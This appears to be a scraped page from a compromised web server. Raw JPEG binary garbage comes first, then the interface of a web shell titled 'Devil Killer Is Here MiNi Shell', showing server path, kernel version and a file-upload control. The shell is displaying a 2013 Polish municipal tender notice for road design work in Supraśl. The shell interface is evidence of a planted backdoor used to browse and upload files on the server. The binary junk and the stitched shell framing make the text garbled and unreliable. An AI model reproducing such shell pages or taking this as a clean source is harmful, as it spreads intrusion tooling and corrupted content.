JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130730/302798-N-2013.html

<p class="kh_header"><b>Supraśl: WYKONANIA DOKUMENTACJI PROJEKTOWEJ:

CZĘŚĆ I WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULICY MYŚLIWSKIEJ I CIOŁKOWSKIEGO (DOJAZD) W GRABÓWCE

CZĘŚĆ II WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULIC: PROSTEJ, WYSOKIEJ, SADOWEJ, MOKREJ I WĄSKIEJ 
W GRABÓWCE

CZĘŚĆ III WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULICY JODŁOWEJ - PRZEBUDOWA WŁĄCZEŃ 
DO ULICY CIOŁKOWSKIEGO I BIAŁOSTOCKIEJ

CZĘŚĆ IV WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ
ULICY ŻWIROWEJ W OGRODNICZKACH</b><br>
<b>Numer ogłoszenia: 302798 - 2013; data zamieszczenia: 30.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Supraśl , ul. Piłsudskiego 58, 16-030 Supraśl, woj. podlaskie, tel. 085 7132725, 7132701, faks 085 7132720, 7132725.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.suprasl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIA DOKUMENTACJI PROJEKTOWEJ:

CZĘŚĆ I WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULICY MYŚLIWSKIEJ I CIOŁKOWSKIEGO (DOJAZD) W GRABÓWCE

CZĘŚĆ II WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULIC: PROSTEJ, WYSOKIEJ, SADOWEJ, MOKREJ I WĄSKIEJ 
W GRABÓWCE

CZĘŚĆ III WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ ULICY JODŁOWEJ - PRZEBUDOWA WŁĄCZEŃ 
DO ULICY CIOŁKOWSKIEGO I BIAŁOSTOCKIEJ

CZĘŚĆ IV WYKONANIE DOKUMENTACJI PROJEKTOWEJ NA BUDOWĘ
ULICY ŻWIROWEJ W OGRODNICZKACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo - kosztorysowej: 
1)	budowy ulicy Myśliwskiej - długość ok. 85 m i Ciołkowskiego (dojazd) - długość ok. 120 m  w Grabówce
2)	budowy ulic: Prostej - długość ok. 200 m, Wysokiej - długość ok. 170 m, Sadowej - długość ok. 240 m, Mokrej - długość ok. 285 m, Wąskiej - długość ok. 180 m w Grabówce,
3)	budowy ulicy Jodłowej - przebudowa włączeń (skrzyżowań) do ulic Ciołkowskiego i Białostockiej w celu zmiany geometrii drogi, w związku z uruchomieniem komunikacji miejskiej,
4)	budowa ulicy Żwirowej w Ogrodniczkach - długość ok. 260 m do ostatnich zabudowań,
- z uwzględnieniem odprowadzenia wód opadowych, ewentualną niezbędną przebudową istniejącej infrastruktury oraz ewentualnymi elementami wodociągu  i kanalizacji sanitarnej (odejścia od głównych sieci), dowiązaniem do istniejących ulic, z uwzględnieniem docelowej szerokości ulic.
Załącznik nr 7 (mapki) do niniejszej SIWZ przedstawia graficznie zakres poszczególnych ulic.

2.	Dokumentację  należy opracować zgodnie z przepisami ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. 2012,  poz. 647), zgodnie z przepisami ustawy z dnia 21 marca 1985 r. o drogach publicznych (Dz. U.  2013, poz. 260). Powinna ona spełniać warunki wynikające z obowiązujących przepisów prawa w szczególności Prawa budowlanego i Prawa zamówień publicznych oraz winna być wykonana zgodnie z normami i zasadami wiedzy technicznej. Złożona dokumentacja winna odpowiadać aktualnemu stanowi prawnemu na dzień złożenia wniosku o wydanie pozwolenia na budowę, winna zawierać wszystkie wymagane uzgodnienia, opinie niezbędne do uzyskania pozwolenia na budowę. Proponowane rozwiązania oraz ewentualne warianty rozwiązań projektowych należy uzgadniać z Zamawiającym.
3.	Zakres opracowania dotyczącego dokumentacji projektowej obejmuje:
1) wykonanie badań i pomiarów w zakresie : 
a)	ustalenia  geotechnicznych  warunków  posadowienia  w  oparciu  o  wszystkie   obowiązujące w tym zakresie przepisy prawne,
b)	wykonania map sytuacyjno-wysokościowych dla celów projektowych w skali l : 1000 lub    1 : 500 z geodezyjną inwentaryzacją szaty roślinnej, 
c)	 pozyskania wypisów i wyrysów z mapy ewidencyjnej gruntów dla obszarów   przeznaczonych pod inwestycję i obszarów, na które ta inwestycja będzie oddziaływać, 
2) opracowanie kompletnego projektu budowlanego wraz z uzyskaniem opinii, uzgodnień i zatwierdzeń, a w tym:                 
    a) wykonanie projektu zagospodarowania terenu ( z uzgodnieniami), 
    b) wykonanie projektu architektoniczno - budowlanego ( z uzgodnieniami),
    c) wykonanie informacji dotyczących bezpieczeństwa i ochrony zdrowia,
3) opracowanie projektu wykonawczego obejmującego część opisową i rysunkową, a w tym: 
     a) projekt zagospodarowania terenu, 
     b) projekty wykonawcze branżowe sporządzone oddzielnie dla każdej branży,
     c) projekty  wykonawcze  instalacji  występujące  w  projektowanych  obiektach,
     d) projekty stałej organizacji ruchu,
     e) projekty niezbędnych  przebudów,  przekładek  i  odtworzeń  istniejących  obiektów uzbrojenia i urządzenia terenu,	
                     f) szczegółowe parametry techniczne obiektów,  instalacji  oraz  urządzeń  związanych               z projektowanymi obiektami umożliwiające wykonawcom robót budowlanych ich dobranie,
                      g) inne  niezbędne  opracowania  i  badania  pozwalające  na  kompleksową  i  prawidłową realizację przedsięwzięcia,	
      h) oświadczenie o kompletności dokumentacji.  
       4.  Zakres dokumentacji kosztorysowej:
               1) przedmiary robót, które winny być opracowane oddzielnie dla każdego projektu zawierające: 
             a) opis robót w kolejności technologicznej ich wykonania, 
              b) odniesienie do specyfikacji Technicznych Wykonania  i Odbioru  Robót  Budowlanych,
            c) podstawy do ustalania cen jednostkowych nakładów rzeczowych z podaniem ilości jednostek przedmiarowych robót zgodnie z założeniami wyjściowymi do kosztorysowania uzgodnionymi z Zamawiającym. 
 2) kosztorysy  inwestorskie,  które winny  być  opracowane  oddzielnie  dla  każdego projektu branżowego. Kosztorysy inwestorskie winny być  opracowane  zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz.1389) oraz zgodnie z art. 33 ustawy  z dnia 29 stycznia 2004 r. - Prawo zamówień  publicznych  ( Dz. U. z  2010 r.  Nr  113, poz. 759 z późn. zm.), 
3) specyfikacje  Techniczne Wykonania  i Odbioru  Robót  Budowlanych (STWIORB)  opracowane zgodnie  z  rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu  i  formy  dokumentacji  projektowej,  specyfikacji  technicznych wykonania  i  odbioru robót budowlanych  oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późn. zm.) i zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, a w  szczególności wymagań  w  odniesieniu  do  właściwości materiałów, sposobu wykonania robót, oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac,
4) założenia wyjściowe  do  kosztorysowania  zawierające  dane  techniczne,  technologiczne             i organizacyjne  nie  określone  w  dokumentacji  projektowej  i  Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych a mające wpływ na wysokość wartości kosztorysowej robót budowlanych oraz inne opracowania wymienione w art. 20 ustawy z  dnia  7 lipca 1994  r. - Prawo Budowlane ( Dz. U.  z  2010  r.  Nr  243,  poz. 1623 z późn. zm.),  a  także  te,  które pozwolą  na  kompleksową  i  prawidłową realizację przedsięwzięcia inwestycyjnego.
5. Ilość i format sporządzonych dokumentów:
1)	projekt budowlany i wykonawczy - w 5  egzemplarzach plus jedna kopia na nośniku elektronicznym w formacie pdf,
2)	przedmiary i kosztorysy inwestorskie - w  2  egzemplarzach plus jedna kopia na nośniku elektronicznym w formacie pdf, doc.,
3)	specyfikacje Techniczne Wykonania  i Odbioru Robót Budowlanych - w 2 egzemplarzach plus jedna kopia na nośniku elektronicznym w formacie pdf, doc.,
4)	mapy sytuacyjno  - wysokościowe - w 2 egzemplarzach  (z oryginalnymi pieczęciami).

 6. Zamawiający wymaga udzielenia co najmniej 3-letniej gwarancji na wykonane prace..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każda oferta musi być zabezpieczona wadium w wysokości: część I  1 000,00 zł (słownie: jeden tysiąc  złotych), część II  1 000,00 zł (słownie: jeden tysiąc  złotych), część III   1 000,00 zł (słownie: jeden tysiąc  złotych), część IV   1 000,00 zł (słownie: jeden tysiąc  złotych). 2. Wadium może być wniesione w jednej lub kilku następujących formach :pieniądzu,   poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,  gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9  listopada 2000 r. o utworzeniu Polskiej  Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275). Wadium wnoszone w pieniądzu wpłaca się przelewem. Wykonawca dołącza do oferty kserokopię wpłaty z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać część I, II, III, IV Wadium  przetarg na  Wykonanie dokumentacji projektowej na budowę .......... część ......... Wadium wnoszone w pieniądzu należy wpłacić na konto zamawiającego: w Banku Spółdzielczym Oddział w Supraślu, rach. nr 72 8060 0004 0680 0130 2000 0040. Wadium należy wpłacić przelewem nie później niż do dnia 07.08.2013r. do godz. 11:00. Za zachowanie terminu do wniesienia wadium uważa się wpływ wadium na konto Zamawiającego najpóźniej w terminie wskazanym powyżej</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, na podstawie oświadczenia (wzór Załącznik nr 2)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie), wykonał co najmniej 2 zamówienia odpowiadające swoim rodzajem i  wartością  usłudze stanowiącej przedmiot zamówienia,  tj. wykonanie dokumentacji   projektowej: na remont, przebudowę lub budowę ulicy 

Zamówienia winne być potwierdzone dowodem, że zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
dysponuje lub będzie dysponował osobami do projektowania posiadającymi doświadczenie, wykształcenie, kwalifikacje zawodowe i uprawnienia wymagane przepisami ustawy Prawo budowlane, niezbędne do wykonania zamówienia. 
Wymaga się dysponowania co najmniej po jednej osobie posiadającej uprawnienia do projektowania w specjalności drogowej, sanitarnej oraz osobą z uprawnieniami w dziedzinie geodezji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu o  których mowa w art. 22 ust. 1 ustawy (wg wzoru Załącznik nr 2)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy, 2. Pełnomocnictwo: w przypadku, gdy wykonawcy ubiegają  się  wspólnie o udzielenie zamówienia oraz w przypadku, gdy osoba reprezentująca podmiot działa w oparciu o pełnomocnictwo, 3.Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, gdy wykonawca wykazuje się wiedzą, doświadczeniem, osobami lub zdolnościami finansowymi innych podmiotów   4.Informacja o przynależności lub nie do grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w zakresie i na zasadach opisanych we wzorze umowy, który jest załącznikiem do siwz</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.suprasl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Supraślu
ul. Piłsudskiego 58
16-030 Supraśl /pokój nr 10/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2013 godzina 11:00, miejsce: Urząd Miejski w Supraślu
ul. Piłsudskiego 58
16-030 Supraśl /pokój nr 10/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - wykonanie dokumentacji projektowej na budowę ulicy Myśliwskiej  i  Ciołkowskiego (dojazd) w Grabówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo - kosztorysowej:budowy ulicy Myśliwskiej - długość ok. 85 m i Ciołkowskiego (dojazd) - długość ok. 120 m  w Grabówce - z uwzględnieniem odprowadzenia wód opadowych, ewentualną niezbędną przebudową istniejącej infrastruktury oraz ewentualnymi elementami wodociągu  i kanalizacji sanitarnej (odejścia od głównych sieci), dowiązaniem do istniejących ulic, z uwzględnieniem docelowej szerokości ulic.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - wykonanie dokumentacji projektowej na budowę ulic: Prostej,  Wysokiej, Sadowej, Mokrej, Wąskiej  w Grabówce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo - kosztorysowej: 2)	budowy ulic: Prostej - długość ok. 200 m, Wysokiej - długość ok. 170 m, Sadowej - długość ok. 240 m, Mokrej - długość ok. 285 m, Wąskiej - długość ok. 180 m w Grabówce - z uwzględnieniem odprowadzenia wód opadowych, ewentualną niezbędną przebudową istniejącej infrastruktury oraz ewentualnymi elementami wodociągu  i kanalizacji sanitarnej (odejścia od głównych sieci), dowiązaniem do istniejących ulic, z uwzględnieniem docelowej szerokości ulic.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - wykonanie dokumentacji projektowej na budowę ulicy Jodłowej - przebudowa włączeń do ulic Ciołkowskiego i Białostockiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompletnej dokumentacji projektowo - kosztorysowej: budowy ulicy Jodłowej - przebudowa włączeń (skrzyżowań) do ulic Ciołkowskiego i Białostockiej w celu zmiany geometrii drogi, w związku z uruchomieniem komunikacji miejskiej - z uwzględnieniem odprowadzenia wód opadowych, ewentualną niezbędną przebudową istniejącej infrastruktury oraz ewentualnymi elementami wodociągu  i kanalizacji sanitarnej (odejścia od głównych sieci), dowiązaniem do istniejących ulic, z uwzględnieniem docelowej szerokości ulic..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV - wykonanie dokumentacji projektowej na budowę ulicy Żwirowej w Ogrodniczkach.</p>
